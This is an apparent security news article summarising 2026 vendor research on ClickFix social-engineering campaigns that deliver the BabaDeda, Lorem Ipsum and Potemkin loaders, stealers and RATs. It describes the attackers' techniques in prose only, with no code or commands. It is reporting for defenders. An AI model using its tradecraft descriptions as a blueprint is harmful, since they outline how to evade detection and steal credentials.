"This new framework keeps that same code genome but expands it into a far more capable loader built for stealth, evasion, and payload flexibility," Morphisec researcher Shmuel Uzan said.
BabaDeda Loader: an evolved loader framework (Morphisec)
Morphisec researchers reported ClickFix attacks in April 2026 that used a revamped BabaDeda Loader to target education and financial organizations. According to Morphisec, the loader retains the "code genome" of earlier BabaDeda activity but extends it into a stealthy, flexible loader that chains together multiple techniques — hidden PowerShell, in-memory shellcode, DLL side‑loading, and external payload storage — to deliver information stealers and remote access trojans (RATs).
Morphisec details that the campaign begins with a ClickFix social engineering lure that convinces victims to run attacker-supplied PowerShell commands. The loader profiles hosts, avoids running on Russian or Belarusian systems, checks security products before retrieving a payload, and injects that payload into trusted Windows processes such as svchost.exe.
One follow-on payload is a .NET backdoor and information stealer with a broad feature set, able to:
- Collect detailed system information and discover installed browser profiles
- Extract browser artifacts — cookies, browsing history, saved credentials, preferences, and local-state encryption keys
- Traverse directories using configurable file-selection rules and read and exfiltrate file contents
- Capture screenshots, execute shell commands or external processes, and transfer data to a command-and-control (C2) server
- Use native Windows APIs for process interaction, memory operations, DPAPI access, Restart Manager behavior, and advanced file access
Storage Crypter and staged delivery: DanaBot and SectopRAT
Morphisec also described a second BabaDeda chain in which a ZIP archive uses a staged component dubbed Storage Crypter. The crypter reads payload material from externally stored containers such as "List.Control.dat," keeping visible installer packages legitimate while hiding malicious contents externally and decoding them only moments before execution. Morphisec warns this design "minimizes forensic visibility, complicates automated analysis, and reduces opportunities for traditional security tools to identify malicious activity before execution occurs."
Lorem Ipsum Loader and Vanilla Tempest attribution (BlueVoyant)
BlueVoyant researchers Thomas Elkins and Joshua Green described a separate ClickFix campaign that delivers a nascent loader and backdoor called Lorem Ipsum Loader, active in the wild since February 2026. The campaign starts from at least five compromised WordPress sites across architecture, legal services, and construction technology sectors and uses Edge web browser security update lures to run a malicious command that downloads a ZIP and an outdated Node.js 7.10.1 runtime released in 2017.
BlueVoyant attributes the Lorem Ipsum ecosystem with high confidence to a financially motivated actor known as Vanilla Tempest (also tracked as Rapid Brigantine, Vice Society, and Vice Spider). The chain uses JavaScript-based droppers and batch scripts to establish persistence through DLL side‑loading (targeting mscoree.dll or msvcp140.dll), decode the embedded Lorem Ipsum Loader, and then retrieve a next-stage Lorem Ipsum Backdoor from C2 infrastructure hosted via attacker-controlled social profiles. BlueVoyant said the backdoor can run next-stage payloads and that the chain "culminates in handoff to Rapid Brigantine's established post-exploitation tooling and ultimately to their documented ransomware deployments, primarily Rhysida."
BlueVoyant also connected this delivery change to a decline in access to fraudulently signed Microsoft Trusted Signing certificates after Microsoft disrupted a group known as Fox Tempest (aka Forging Marauder). "The loss of certificate supply rendered the previously signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely," the researchers said.
Potemkin, RMMProject, and EtherRAT (Huntress)
Huntress researchers Anna Pham and Zach Rogers reported a third ClickFix campaign that installs an MSI package and drops a previously undocumented Potemkin loader via an HTA payload. Potemkin is a custom x64 loader that uses a domain generation algorithm (DGA) driven by a built‑in 1,000-word dictionary to find C2, reflectively loads modules in memory, and writes a unique UUID to "%LOCALAPPDATA%\\hyper-v.ver" for victim identification. The loader supports task polling, DLL retrieval and execution, and a custom byte cipher protecting C2 communication and the DGA dictionary.
Huntress found Potemkin was used to stage EtherRAT and RMMProject. RMMProject is a Lua-scriptable DLL that can remotely screen-control victims, collect browser credentials by bypassing Chromium App‑Bound Encryption protections, dispatch tasks to run files or processes, take screenshots, execute arbitrary Lua scripts, and download runtime modules. Huntress reported hands-on-keyboard activity after access: configuring Microsoft Defender exclusions, deploying Chisel reverse SOCKS tunnels, establishing a Cloudflare tunnel for persistence, and lateral propagation via WMIExec and SMBExec to reach a domain controller, spreading EtherRAT across more than 11 hosts. This activity was detected by the vendor "last month."
What this means for security teams, enterprises, and macOS users
Security teams and technologists should note a clear pattern: modular, staged loaders separate delivery, storage, execution, and payload deployment to reduce forensic visibility and complicate automated detection. The campaigns combine social-engineering-delivered PowerShell and browser security update lures with DLL side‑loading, reflective loading, and external payload containers.
Affected enterprises and procurement leaders should register the operational impact described by Huntress — hands-on configuration of Defender exclusions, tunnel setup, and lateral spread — as a reminder that initial click-and-paste social engineering can yield persistent, high‑privilege access that reaches domain controllers and multiple hosts.
End users — and specifically macOS users — face a continuing social-engineering risk. Huntress noted ClickFix remains effective because it exploits ordinary troubleshooting behavior, and Apple has introduced a macOS Tahoe 26.4 security pop-up that warns users when they attempt to paste commands into Terminal. Apple said the alert "helps make sure that you aren't tricked into running a command that you didn't expect."
These investigations together illustrate a common trajectory: when one delivery model becomes untenable, operators adapt. ClickFix lures — deceptively simple instructions presented as legitimate troubleshooting — have given attackers a flexible on-ramp to multiple loaders and established malware families, from data‑stealers and RATs to ransomware handoffs. As Morphisec, BlueVoyant, and Huntress show, the loaders are growing more modular and stealthy, leaving defenders to spot small behavioral signals amid decoupled stages of execution.
https://thehackernews.com/2026/06/clickfix-campaigns-expand-malware.html
